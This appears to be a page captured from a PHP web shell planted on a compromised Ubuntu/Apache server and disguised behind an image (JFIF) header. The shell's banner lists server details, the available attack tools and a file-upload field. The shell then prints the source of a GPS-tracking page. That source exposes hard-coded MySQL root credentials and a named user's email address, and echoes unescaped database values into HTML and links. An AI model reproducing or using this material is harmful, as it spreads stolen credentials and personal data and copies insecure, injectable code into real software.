????JFIF??x?x????'
Server IP : 79.136.114.73 / Your IP : 13.59.90.172 Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64 User : www-data ( 33) PHP Version : 5.5.9-1ubuntu4.29 Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority, MySQL : ON | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /var/www/appsrv.astacus.se/gps2xml/ |
Upload File : |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" /> <title>GPS2XML</title> <style type="text/css"> .text { font-family: Verdana, Geneva, sans-serif; font-size: 12px; } </style> </head> <body bgcolor="#383838"> <br /> <table width="400" border="0" align="center" cellpadding="0" cellspacing="0"> <tr> <td><img src="images/logo.jpg" width="230" height="50" /><br /> <img src="images/bg_top.jpg" width="974" height="22" /></td> </tr> <tr> <td background="images/bg_mid.jpg"><table width="900" border="0" align="center" cellpadding="0" cellspacing="0"> <tr> <td class="text"><br /> Welcome to the GPS2XML data center. It is to this server all your GPS data is sent in realtime while using the App. All your routes are listed below and you can choose what you want to do with the XML data.<br /> <br /> <br /> <br /> <?php $link = mysql_connect ("localhost", "root", "root123"); mysql_select_db ("gps2xml"); $sql = "SELECT * from tblData where username = 'carl.hoffstedt@astacus.se' group by unitid"; $result = mysql_query($sql); while ($row = mysql_fetch_assoc($result)){ $Username = $row['username']; $Identifier = $row['unitid']; $Date = $row['timestamp']; ?> <table width="900" height="133" border="0" cellpadding="0" cellspacing="0"> <tr> <td width="85" rowspan="2"><img src="images/iphone.jpg" width="63" height="109" /></td> <td width="82" rowspan="2" valign="top"><br /> <br /> Username:<br /> <br /> Identifier:<br /> <br /> Date:</td> <td width="202" rowspan="2" valign="top"><br /> <br /> <?php echo($Username);?><br /> <br /> <?php echo($Identifier);?><br /> <br /> <?php echo($Date);?></td> <td width="131" height="118" align="center" valign="middle"><p><br /> <a href="downloadxml.php?username=<?php echo($Username);?>&id=<?php echo(($Identifier));?>"><img src="images/xml.jpg" width="55" height="50" border="0" /></a><br /> <br /> </p></td> <td width="177" align="center" valign="middle"><a href="openrss.php?username=<?php echo($Username);?>&id=<?php echo(($Identifier));?>"><img src="images/rss.jpg" width="55" height="50" border="0" /></a></td> <td width="223" align="center" valign="middle"><a href="http://maps.google.com/maps?q=http://appsrv.astacus.se/gps2xml/googlemaps.php?checksum=<?php echo(md5($Username.$Identifier));?>" target="_new"><img src="images/google.jpg" width="133" height="55" border="0" /></a><br /></td> </tr> <tr> <td height="15" align="center" valign="top">Download XML-file</td> <td height="15" align="center" valign="top">Open RSS-feed</td> <td width="223" align="center" valign="middle">Show locations on Google Maps.</td> </tr> </table> <hr /> <br /> <?php } ?> <br /></td> </tr> </table></td> </tr> <tr> <td><img src="images/bg_bot.jpg" width="974" height="22" /></td> </tr> </table> </body> </html>